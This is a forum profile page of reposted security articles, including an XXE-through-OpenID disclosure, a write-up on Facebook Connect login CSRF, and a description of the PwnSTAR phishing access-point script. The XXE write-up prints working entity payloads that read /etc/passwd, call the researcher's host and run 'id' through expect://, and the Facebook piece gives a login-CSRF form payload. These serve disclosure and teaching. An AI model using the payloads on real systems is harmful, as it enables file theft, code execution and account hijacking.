-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Applying Artificial Intelligence to Nintendo Tetris Abstract In this article, I explore the deceptively simple mechanics of Nintendo Tetris. Afterwards, I describe how to build an AI that exploits them. Table of Contents Abstract Table of Contents Try It Yourself About Preliminaries Download Run Configuration The Mechanics of Nintendo Tetris Representing Tetriminos Rotating Tetriminos Spawning Tetriminos Picking Tetriminos Shifting Tetriminos Dropping Tetriminos Slides and Spins Level 30 and Beyond Lines and Statistics Coloring Tetriminos Game Mode Legal Screen Demo The Kill Screen Endings 2 Player Versus Music and Sound Effects Play States and Render Modes The Algorithm Overview Searching for Lock Evaluation Function Other Factors AI Training Java Version About Packages AI Classes and Interfaces Invoking the AI Displaying the Playfield Other Projects Gamepad Version Try It Yourself About For those lacking the persistence, patience and time necessary to master Nintendo Tetris, I created an AI to play it for you. Finally, you can experience level 30 and beyond. You can witness the score max out while the line, level and statistics counters wraparound indefinitely. Find out what colors appear in levels higher than any human has ever reached. Discover how long it can go. Preliminaries To run the AI, you'll need FCEUX, the all-in-one NES/Famicom emulator. The AI was developed for FCEUX 2.2.2, the most recent version at the time of this writing. You'll also need the Nintendo Tetris ROM file (USA version). Google might be able to help you to track it down. Download Extract lua/NintendoTetrisAI.lua from this source zip. Run Start up FCEUX. From the menu bar, select File | Open ROM... In the Open File dialog box, select the Nintendo Tetris ROM file and press Open. The game will launch. From the menu bar, select File | Lua | New Lua Script Window... From the Lua Script window, enter the path to NintendoTetrisAI.lua or hit the Browse button to navigate to it. Finally, press Run. The Lua script will direct you to the first menu screen. Leave the game type as A-Type, but feel free to change the music using the arrow keys. On slower computers, the music may play choppy; you might want to disable it completely. Press Start (Enter) to advance to the next menu screen. In the second menu, you can change the starting level using the arrow keys. Press Start to begin the game. The AI will take over from there. From the second menu screen, after you select the level, if you hold down gamepad button A (use Config | Input... to modify the keyboard mapping) and press Start, the resulting starting level will be 10 plus the selected value. The highest starting level is 19. Articol: Applying Artificial Intelligence to Nintendo Tetris
-
This is a project I started to learn C code. injdmp detects injected processes via searching memory marked as RWX, DLLs loaded using the registry values AppInit_DLLs & AppCertDlls, dummy processes and MZ headers in memory marked as . In the extra dir there is some code for detecting threads running in memory space marked as RWX. See the website for usage details. Disclaimer: Use at your own risk. OwnerAlexander Hanel Websitehttp://hooked-on-mne… Size 100.7 KB (download) Sursa: https://bitbucket.org/Alexander_Hanel/injdmp
-
Static Analysis by Elimination Pavle Subotic1 , Andrew E. Santosa2 , and Bernhard Scholz Uppsala University, Sweden 2 Oracle Labs, Australia University of Sydney, Australia Abstract. In the past, elimination-based data flow analysis algorithms have been proposed as an alternative to iterative algorithms for solving dataflow problems. Elimination-based algorithms exhibit a better worst-case runtime performance than iterative algorithms. However, the implementation of elimination-based al- gorithms is more challenging and iterative algorithms have been sufficient for solving standard data-flow problems in compilers. For more generic abstract in- terpretation frameworks, it has not been explored whether elimination-based al- gorithms are useful. In this paper we show that elimination-based algorithms are useful for implementing abstract interpretation frameworks for low-level pro- gramming languages. We demonstrate the feasibility of our approach by a range analysis developed in the LLVM framework. We supplement this work by a range of experiments conducted through several test suites. Download: http://user.it.uu.se/~pasu4571/bytecode13.pdf
-
Defending Against Tor-Using Malware, Part 1 11:48 pm (UTC-7) | by Jay Yaneza (Technical Support) In the past few months, the Tor anonymity service as been in the news for various reasons. Perhaps most infamously, it was used by the now-shuttered Silk Road underground marketplace. We delved into the topic of the Deep Web in a white paper titled Deepweb and Cybercrime. In our 2014 predictions, we noted that cybercriminals would go deeper underground – and part of that would be using Tor in greater numbers. Cybercriminals are clearly not blind to the potential of Tor, and network administrators have to consider that Tor-using malware might show up on their network. How should they react to this development? What’s Tor, anyway? Tor is designed to solve a fairly specific problem: to stop a man-in-the-middle (such as network administrators, ISPs, or even countries) from determining or blocking the sites that a user visits. How does it do this? Previously known as “The Onion Router”, Tor is an implementation of the concept of onion routing, where a number of nodes located on the Internet that serve as relays for Internet traffic. A user who wants to use the Tor network would install a client on their machine. This client would contact a Tor directory server, where it gets a list of nodes. The user’s Tor client would select a path for the network traffic via the various Tor nodes to the destination server. This path is meant to be difficult to follow. In addition, all traffic between nodes is encrypted. (More details about Tor may be found at the official website of the Tor project.) In effect, this hides your identity (or at least, IP address) from the site you visited, as well as any potential attackers inspecting your network traffic along the way. This is quite useful if you’re a visitor who wants to cover your tracks or if, for some reason, the server that you’re trying to connect to denies connections from your IP address. This can be done for both legitimate and illegitimate reasons. Unfortunately, this means that it can and has already been used for malicious purposes. How can it be used maliciously? Malware can just as easily use Tor as anyone else. In the second half of 2013, we saw more malware making use of it to hide their network traffic. In September, we blogged about the Mevade malware that downloaded a Tor component for backup command and control (C&C) communication. In October 2013, Dutch police arrested four persons behind the TorRAT malware, a malware family which also used Tor for its C&C communication. This malware family targeted the bank accounts of Dutch users, and investigation was difficult because of the use of underground crypting services to evade detection and the use of cryptocurrencies (like Bitcoin). In the last weeks of 2013, we saw some ransomware variants that called itself Cryptorbit that explicitly asked the victim to use the Tor Browser (a browser bundle pre-configured for Tor) when paying the ransom. (The name may have been inspired by the notorious CryptoLocker malware, which uses similar behavior.) Figure 1. Warning from Tor-using ransomware Earlier this month, we discussed several ZBOT samples that in addition to using Tor for its C&C connection, also embeds its 64-bit version ”inside” the normal, 32-bit version. Figure 2. Running 64-bit ZBOT malware This particular malware runs perfectly in a 64-bit environment and is injected into the running svchost.exe process, as is typically the case with injected malware. This increase in Tor-using malware means that network administrators may want to consider additional steps to be aware of Tor, how to spot its usage, and (if necessary) prevent its use. Illegitimate usage of Tor could result in various problems, ranging from circumvented IT policies to exfiltrated confidential information. We will discuss these potential steps in a succeeding blog post. Sursa: Defending Against Tor-Using Malware, Part 1 | Security Intelligence Blog | Trend Micro
-
[h=2]PwnSTAR: Pwn SofT Ap scRipt[/h] A bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing. It can act as multi-client captive portal using php and iptables, Launches classic exploits such as evil-PDF. Features takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server steals WPA handshakes phishes email credentials serves webpages: supplied (eg hotspot, below) or provide your own sniffing with ferret and sslstrip adds a captive portal to the frontend of the fake AP assorted exploits de-auth with MDK3, aireplay-ng or airdrop-ng Use your imagination, craft your own webpages, and have fun. You can download the pwnstar script from here and save in your desktop Sursa: Hacking Articles|Raj Chandel's Blog: PwnSTAR: Pwn SofT Ap scRipt
-
Detecting Custom Memory Allocators in C Binaries Xi Chen Asia Slowinska Herbert Bos Vrije Universiteit Amsterdam, The Netherlands Abstract—Many reversing techniques for data structures rely on the knowledge of memory allocation routines. Typically, they interpose on the system’s malloc and free functions, and track each chunk of memory thus allocated as a data structure. How- ever, many performance-critical applications implement their own custom memory allocators. Examples include webservers, database management systems, and compilers like gcc and clang. As a result, current binary analysis techniques for tracking data structures fail on such binaries. We present MemBrush, a new tool to detect memory allocation and deallocation functions in stripped binaries with high accu- racy. We evaluated the technique on a large number of real world applications that use custom memory allocators. As we show, we can furnish existing reversing tools with detailed information about the memory management API, and as a result perform an analysis of the actual application specific data structures designed by the programmer. Our system uses dynamic analysis and detects memory allocation and deallocation routines by searching for functions that comply with a set of generic characteristics of allocators and deallocators. Download: http://www.cs.vu.nl/~herbertb/papers/membrush_wcre13.pdf
-
Revisting XXE and abusing protocols Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable. The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags: <head> <link rel="openid.server" href="http://www.example.com/myendpoint/" /> <link rel="openid2.provider" href="http://www.example.com/myendpoint/" /> </head> Whereas the Yadis discovery relies on a XRDS document: <xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7804:/raw</URI> <openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS> Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'. From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using XML Validation: XML Validation) <?xml version="1.0" standalone="no"?> <!DOCTYPE xrds:XRDS [ <!ELEMENT xrds:XRDS (XRD)> <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds"> <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0"> <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)"> <!ELEMENT XRD (Service)*> <!ELEMENT Service (Type,URI,openid:Delegate)> <!ATTLIST Service priority CDATA "0"> <!ELEMENT Type (#PCDATA)> <!ELEMENT URI (#PCDATA)> <!ELEMENT openid:Delegate (#PCDATA)> <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'> ]> <xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS> In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC. "Testing for successful XXE" It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly. The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL. "The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file." "Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL." Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd. "The decoded base64 string yielded the contents of /etc/passwd" This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution. "RCE - retrieving the current user id" And Boom goes the dynamite. This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution. "RCE - retrieving the current user id" And Boom goes the dynamite. All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1 ./et - See more at: SensePost Blog And Boom goes the dynamite. All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1 Sursa: SensePost Blog
-
The World's Worst Penetration Test Report by #ScumbagPenTester "MySQL configured to allow connections from 127.0.0.1. Recommend configuration change to not allow remote connections." "Fixing the configuration will no longer allow evil connections by evil connection for configuration of server."
-
[h=3]Two "WontFix" vulnerabilities in Facebook Connect[/h] TL;DR Every website with "Connect Facebook account and log in with it" is vulnerable to account hijacking. Every website relying on signed_request (for example official JS SDK) is vulnerable to account takeover, as soon as an attacker finds a 302 redirect to other domain. I don't think these will be fixed, as I've heard from the Facebook team that it will break compatibility. I really wish they would fix it though as you can see below, I feel these are serious issues. I understand the business reasons why they might choose so, but from my perspective when you have to choose between security and compatibility, the former is the right bet. Let me quickly describe what these bugs are and how you can protect your websites. CSRF on facebook.com login to hijack your identity. It's higher level Most-Common-OAuth-Vulnerability (we attached Attacker's Social Account to Victim's Client Account) but here even Clients using "state" to prevent CSRF are vulnerable. <iframe name="playground" src='data:text/html,<form id="genform" action="https://www.facebook.com/login.php" method="POST"><input type="hidden" name="email" value="homakov@gmail.com"><input type="hidden" name="pass" value="password"></form><script>genform.submit()</script>'></iframe> FYI we need data: trick to get rid of Referer header, Facebook rejects requests with cross domain Referers. This form logs victim in attacker's arbitrary account (even if user is already logged in, logout procedure is trivial). Now to all OAuth flows Facebook will respond with Attacker's profile information and Attacker's uid. Every website with "Connect your Facebook to main account to login faster" functionality is vulnerable to account hijacking as long as attacker can replace your identity on Facebook with his identity and connect their Facebook account to victim's account on the website just loading CLIENT/fb/connect URL. Once again: even if we cannot inject our callback with our code because of state-protection, we can re-login user to make Facebook do all the work for us! Almost all server-side libraries and implementations are "vulnerable" (they are not, it's Facebook who's vulnerable!) : omniauth, django-social-auth, etc. And yeah, official facebook-php-sdk. (By the way, I found 2 bugs in omniauth-facebook: state fixation, authentication bypass. Update if you haven't yet.) Mitigation: require CSRF token for adding a social connection. E.g. instead of /connect/facebook use /connect/facebook?authenticity_token=123qwe. It will make it impossible for an attacker to start the process by himself. Facebook JS SDK and #signed_request Since "redirect_uri" is flexible on Connect since its creation, Facebook engineers made it a required parameter to obtain "access_token" for issued "code". If the code was issued for a different (spoofed) redirect_uri, provider will respond with mismatch-error. signed_request is special non-standard transport created by Facebook. It carries "code" as well, but this code is issued for an empty redirect_uri = "". Furthermore, signed_request is sent in a #fragment, so it can be leaked easily with any 302 redirect to attacker's domain. And guess what — the redirect can even be on a subdomain. of our target! Attack surface gets so huge, no doubt you can find a redirecting endpoint on any big website. Basically, signed_request is exactly what "code" flow is, but with Leak-protection turned off. All you need is to steal victim's signed_request with a redirect to your domain (slice it from location.hash), then open the Client website, put it in the fbsr_CLIENT_ID cookie and hit client's authentication endpoint. Finally, you're logged in as the owner of that signed_request. It's just like when you steal username+password. Mitigation: it's hard to get rid from all the redirects. For example Facebook clients like soundcloud, songkick, foursquare are at the same time OAuth providers too, so they have to be able to redirect to 3rd party websites. Each redirect to their "sub" clients is also a threat to leak Facebook's token. Well, you can try to add #_=_ to "kill" fragment part.. It's better to stop using signed_request (get rid of JS SDK) and start using (slightly more) secure code-flow with protections I mentioned above. Conclusion In my opinion I'd recommend not using Facebook Connect in critical applications (nor with any other OAuth provider). Perhaps it's suitable quick login for a funny social game but never for a website with important data. Use oldschool passwords instead. If you must use Facebook Connect, I recommend whitelisting your redirect_uri in app's settings and requiring user interaction (clicking some button) to start adding a new connection. I really hope Facebook will change their mind, to stay trustworthy identity provider. Author: Egor Homakov on 10:27 PM Sursa: Egor Homakov: Two "WontFix" vulnerabilities in Facebook Connect
-
Spy agencies are slurping personal data from leaky mobile apps by Lisa Vaas on January 29, 2014 The US' National Security Agency (NSA) and its UK counterpart, GCHQ, have been honing their data-slurping technologies to suck up whatever they can get from leaky smartphones, the Guardian reported on Tuesday. Beyond device details, data shared over the internet by iOS and Android apps can include personal information such as age, gender, and location, while some apps share even more sensitive user information, such as sexual preference or whether a given user might be a swinger. The Guardian, relying on top-secret documents handed over by whistleblower Edward Snowden, says that the spy guys are developing capabilities to milk this private information from apps as innocuous as the insanely popular Angry Birds game. Reporting in partnership with the New York Times and Pro Publica, they revealed that the NSA and GCHQ have "extensive tools" ready to throw against iPhone, Android and other phone platforms. The agencies also apparently think of Google Maps as a gold mine. The Guardian reports that one project involved intercepting Google Maps queries from smartphones to collect large volumes of location data. The newspaper quotes a 2008 document's gleeful assessment of the Google Maps work, in which it noted that: t effectively means that anyone using Google Maps on a smartphone is working in support of a GCHQ system. The documents suggest that, depending on how much information a user has provided in his or her profile on a given app, the agency could collect "almost every key detail of a user's life", the Guardian reports: home country, current location (through geolocation), age, gender, zip code, marital status - options included "single", "married", "divorced", "swinger" and more - income, ethnicity, sexual orientation, education level, and number of children. Given how popular Angry Birds is, and given that the secret documents use it as a case study, some articles have hung Angry Birds in their headlinery - that's like finery, but with headlines instead of undies. But Angry Birds shouldn't be singled out as being in any way subverted or corrupted by the NSA or GCHQ. Angry Birds is, after all, just one of thousands of mobile apps, none of which has been indicted as complicit with, or data-raked by, the NSA or GCHQ - rather, the spying agencies are, as news reports say, simply tapping data as it flies across the network. Rovio, the maker of Angry Birds, told the Guardian that it wasn't aware of any NSA or GCHQ programs looking to extract data from its apps users. The newspaper quotes Saara Bergström, Rovio's VP of marketing and communications: Rovio doesn't have any previous knowledge of this matter, and have not been aware of such activity in third-party advertising networks. Nor do we have any involvement with the organisations you mentioned [NSA and GCHQ]. The NSA's data sniffing is far from news, of course - the names PRISM and XKeyscore should ring some bells in that department. Much of the profile data in question isn't being nefariously pickpocketed from app users, at any rate. As Naked Security pointed out on Monday in honor of Data Privacy Day, many of us are willingly giving our personal data away. It's easy to see why: it's a heck of a lot more fun to have apps spill your beans, since in exchange we get linked to communities or get shiny doo-dads. All we have to do is fill out profiles with stuff they actually don't, really, need - birthdates, marital status, etc. We can take back a big chunk of our privacy simply by refusing to hand over data, whether it's given in a profile or beamed out when we have WiFi and/or geolocation turned on. Cinching our data waistbands can be done with three simple steps, outlined by Naked Security in the Privacy Plan Diet. If you can live without "Find My iPad" or other such geolocation-dependent goodies, you can keep a lot of your data out of the hands of spies, marketers or other data busybodies. But beyond information knowingly handed over in profiles, phone apps have a nasty habit of sharing more data than users may realize. Sometimes the holes come from software bugs, but then again, sometimes data leakage is an unintended consequence of users' own, deliberate actions, such as: Twitter users having geolocation turned on, using the word "home" in their tweets and, Presto! thereby potentially handing a nosy little application their home address. Soldiers snapping photos that smartphones then automatically geotag, giving the enemy their coordinates. Fugitives' locations - John McAfee comes to mind - babbled by a photo's location metadata, precise latitude, longitude, time and all. Beyond bugs and deliberate leakage from probably-inattentive users is yet another category: apps that silently gulp data in the background while they're doing innocent-seeming things in the foreground, such as being a flashlight or a mobile app for kids. There are issues with mobile privacy, and then too there's security. Specifically, phones have lagged behind websites in their use of encryption, such as, for example, the notable lack of security in banking apps. Why cast a hairy eyeball at privacy as it plays out in Angry Birds profile data when you've got iOS banking apps to worry about? Given recent research from Ariel Sanchez, a researcher at security assessment company IOActive, there's very little security indeed to be had there. Sanchez found that out of 40 iOS banking apps used by 60 banks in about 20 countries, 70% of the apps offered no support at all for two-factor authentication (2FA), and 40% of the apps weren't validating SSL certificates - in other words, they weren't able to notice bogus SSL certificates when accessing supposedly secure HTTPS traffic and couldn't, therefore, stop a theoretical man-in-the-middle attack. What does this have to do with Angry Birds et al.? If the connection between the phones and the servers such apps were talking to had been well-encrypted, then it's likely that the data they exchanged would have been unintelligible to anyone trying to read it on-the-wire. Should Angry Birds, or ads on Angry Birds, or the other apps in question, or the ads on those apps, have been using HTTPS or some form of encryption? Yes. But the lack of such security measures isn't, unfortunately, remarkable, as research including Sanchez's work on iOS banking apps makes clear. Sursa: Spy agencies are slurping personal data from leaky mobile apps | Naked Security
-
SSL/TLS analysis of the Internet's top 1,000,000 websites Par Julien Vehent le samedi, janvier 11 2014, 00:32 - General - Lien permanent It seems that evaluating different SSL/TLS configurations has become a hobby of mine. After publishing Server Side TLS back in October, my participation in discussions around ciphers preferences, key sizes, elliptic curves security etc...has significantly increased (ironically so, since the initial, naive, goal of "Server Side TLS" was to reduce the amount of discussion on this very topic). More guides are being written on configuring SSL/TLS server side. One that is quickly gaining traction is Better Crypto, which we discussed quite a bit on the dev-tech-crypto mailing list. People are often passionate about these discussions (and I am no exception). But one item that keeps coming back, is the will to kill deprecated ciphers as fast as possible, even if that means breaking connectivity for some users. I am absolutely against that, and still believe that it is best to keep backward compatibility to all users, even at the cost of maintaining RC4 or 3DES or 1024 DHE keys in our TLS servers. One question that came up recently, on dev-tech-crypto, is "can we remove RC4 from Firefox entirely ?". One would think that, since Firefox supports all of these other ciphers (AES, AES-GCM, 3DES, Camellia, ...), surely we can remove RC4 without impacting users. But without numbers, it is not an easy decision to make. Challenge accepted: I took my cipherscan arsenal for a spin, and decided to scan the Internet. Articol: https://jve.linuxwall.info/blog/index.php?post/TLS_Survey
-
SpyEye malware creator Aleksandr Panin pleads guilty Graham Cluley | January 29, 2014 9:29 am The primary developer of the notorious SpyEye banking malware has pleaded guilty to conspiracy to commit wire and bank fraud, in relation to his role in a cybercriminal campaign that has infected over 1.4 million computers worldwide. SpyEye, a variant of the Zeus banking Trojan, is used by criminal gangs to help them break into victims’ online bamk accounts and steal personally identifiable information. Sold on the criminal underground as a kit for between $1,000 to $8,500, hackers could take SpyEye and customise it for their own malicious purposes. Once computers have become infected by SpyEye, online criminals are able to remotely control them, logging keystrokes and stealing personal and financial data that is silently transmitted to servers under the hackers’ control. According to a Department of Justice press release, Russian national Aleksandr Andreevich Panin (who used the online handles “Gribodemon” and “Harderman”) has now admitted his involvement. “The apprehension of Mr. Panin means that one of the world’s top developers of malicious software is no longer in a position to create computer programs that can victimize people around the world. Botnets such as SpyEye represent one of the most dangerous types of malicious software on the Internet today, which can steal people’s identities and money from their bank accounts without their knowledge. The FBI will continue working with partners domestically and internationally to combat cyber-crime.” Between 2009 and 2011, Panin operated from his Russian base, conspiring with others to develop, market and sell versions of SpyEye to other online criminals. In all, Panin is thought to have sold the SpyEye malware kit to over 150 criminals. One of them, using the name “Soldier” is reported to have used SpyEye to earn more than $3.2 million in just six months. Panin’s cybercrime career came unstuck, however, when he took a holiday in the Dominican Republic last summer. Without formally extraditing him, local police threw him onto a plane to the United States where he was arrested by federal agents. The nature of Panin’s arrest raised controversy in Russia, where the foreign affairs ministry warned citizens who believed they might have charges raised against them to avoid travelling overseas. Arrests at airports appears to have become a theme in the apprehension of the key individuals involved in the SpyEye malware case. Amongst Panin’s alleged conspirators was Hamza Bendelladj, aka “Bx1,” who smiled broadly as he was paraded before the media after his arrest at Bangkok’s Suvarnnabhumi airport in January 2013, as he was in transit from Malaysia to Egypt. Bendelladj was subsequently extradited to the United States, and is currently pending charges. Sentencing for Panin is scheduled for April 29, 2014. Sursa: SpyEye malware creator Aleksandr Panin pleads guilty
-
How to Start an Anonymous Blog 26 January 2014 Introduction I believe that by following the steps I outlined in this post, no one will ever be able to reveal my identity. My domain may be seized and my blog can be closed, but I am confident that my identity will remain a mystery. I can say these things mainly because I believe in a very important tool called Tor. Developers and operators of Tor nodes work to ensure that anyone can be anonymous on the internet. Tor is a great pain to the NSA, and any other organization or country that wants to spy on internet activity. The Tor network makes it very difficult to track down IP addresses, and domain registration is now available via Bitcoin, so I never needed to provide any personal information when setting up this blog. Tools and Resources USB Drive Tails OS Tor Network Local Bitcoins — buy Bitcoins for cash Free email accounts from outlook.com and anonymousspeech.com Domain name purchased from IT Itch Static site hosted on GitHub Pages Tails / Tor Tails is started from a USB disk, which also includes an encrypted partition. The encrypted partition holds a Bitcoin wallet, blog source code and Keepass database. My passwords for third-party services are randomly generated, and very strong. Tails makes it very hard to go wrong, because all network connections are forced through Tor. For example, to develop this blog locally, I must add some firewall rules to allow local connections on port 4000, download a different browser (Midori), and then tell it to skip using a proxy server. The firewall rules block all external requests in Midori, but I can access http://localhost:4000. So unless I do some nonsense like log in to StackOverflow using my real Google account and use the “untraceableblog” username, I believe it will be almost impossible to track me. I make a backup of the USB flash drive on my primary computer and save it to a TrueCrypt hidden volume. I like the idea of hidden volumes, I feel like a fucking spy. The idea is that you can have a fake password that unlocks the encrypted fake folder, and a real password that unlocks the real encrypted folder, and there is absolutely no way to know which one you unlocked. In my fake encrypted folder, I keep my personal Keepass database, credit cards, and scans of my passport and driving license. So if someone forces me to enter my password to unlock my computer, and finds that in their opinion, I have a volume of TrueCrypt, then there is no way of knowing if I entered the real or fake password. This feature allows even a little protection from “wrench attacks”: XKCD: wrench attacks Most of the time I hide the stick in a secret location in the house. When I need to go somewhere and want to be able to update this blog, I’ll back it up to the hidden volume, and then securely erase the USB disk, so I can take it with me without fear. This is what I must do until the Tails adds its own function for ‘hidden volumes’. E-mail I signed up for a free email account from Outlook.com, and used anonymousspeech.com account as a verification and backup. I tried Gmail first, but Google makes it very difficult to sign up for accounts, when you use Tor, because they require phone verification. This is fair enough, because people like to create a huge number of fake accounts Gmail to send spam. Blog This blog is free on GitHub Pages. It uses Octopress to create a static site, and I installed the Page Turner theme. I push to GitHub with an SSH key, which is, of course, encrypted and stored on my USB stick. I can think of two vectors, which can give out information about my identity: Message Timestamps The Tails operating system has a good policy of forcing the system time to always be UTC. But if I wrote a series of blog posts in the coming years, you could maybe analyize timestamps to determine my time zone. However, the compiled site shows only the date. Also, I travel a lot. (Or do I?) Word and character frequency analysis You may be able to find out my country of origin or identity by my words and phrases. You might even be able to find a match with the other content that I posted online under my real identity. I counter this by running all my posts through Google Translate. I translate into another language, then to English, and then correct the errors. It’s great for mixing up my vocabulary, but I wish it didn’t fuck up Markdown and HTML so much. Until this point, you might have assumed that English was my second language. But let me assure you, I will neither confirm nor deny it. One problem is that Google can see my original messages, and the NSA can probably see them too. If I wanted to avoid it, I could post some anonymous translation jobs and pay the translaters via Bitcoin. Analytics See the email section for reasons why Google Analytics was unavailable. I signed up for StatCounter instead. But even if Google Analytics were available, I wouldn’t use a tracking ID linked to my real identity. Many anonymous bloggers have been busted by Google’s Reverse ID Lookup tool. Buying Bitcoins with maximum anonymity I bought the Bitcoins from local Bitcoins, using an anonymous account that I set up over Tor. I found a seller who was willing to meet in person, and we agreed on a time and place. We met, I gave them money, and they released the Bitcoins from escrow using their phone. Buying a domain name with Bitcoins IT Itch is a domain registrar that accepts payments via BitPay. Their domains are quite expensive at $15 USD each, but worth it for completely anonymous registration. This was an easy process, but it took a long time for the domain to become active (over an hour). Once it had been activated, I configured the DNS records for GitHub Pages, and then my blog was live at Untraceable One thing that IT Itch did terribly wrong was to e-mail me my password in plain text after I signed up. NO GOOD! If someone got access to my outlook email, they could have signed in and ruined my domain. So I deleted the message and changed my password, and luckily they did not email me a new password. How I could get busted, Part One Tracing the Bitcoins In theory, you could follow the trail of Bitcoin transactions and discover my identity. However, in this case, it is very unlikely that even the most sophisticated and well-funded organizations would be able to find me. See, I bought these Bitcoins using an anonymous account on localbitcoins.com (created using Tor). The seller and I agreed on the spot to meet in person, and I paid cash. To reveal my identity, you would need to break or work for every service that I used. Like this: 1) Get access to the ititch.com database, and find the BitPay transaction identifier for untraceableblog.com 2) Get access to the BitPay database, and find the Bitcoin address that sent Bitcoins for this transaction 3) Get access to the localbitcoins.com database. Find the Bitcoin address which sent the coins to BitPay, trace the transactions back until you find a localbitcoins escrow address. 4) From the escrow address, you might be able to find the localbitcoins accounts, and then you can read the messages that we exchanged about meeting up. 5) You would need to visit this location, and hope that there are some surveillance cameras that might have captured us on the day. 6) You’d finally need access to the security company that has security camera footage archives, get a clear picture of my face, and somehow run a facial recognition scan to find my identity. Working for Facebook or the NSA may help if you get that far. How I could get busted, Part Two Everything is hacked. All of it. The Internet is a machine based on trust, and there are many ways that this trust can be broken. Someone may be able to generate trusted SSL certificates for any domain, demand that ISPs route all traffic through them, or control a huge amount of Tor nodes and perform traffic analysis attacks. I will not go into details, but if you’re interested, you can read more about Tor attacks: How NSA attacks Tor / Firefox users with quantum 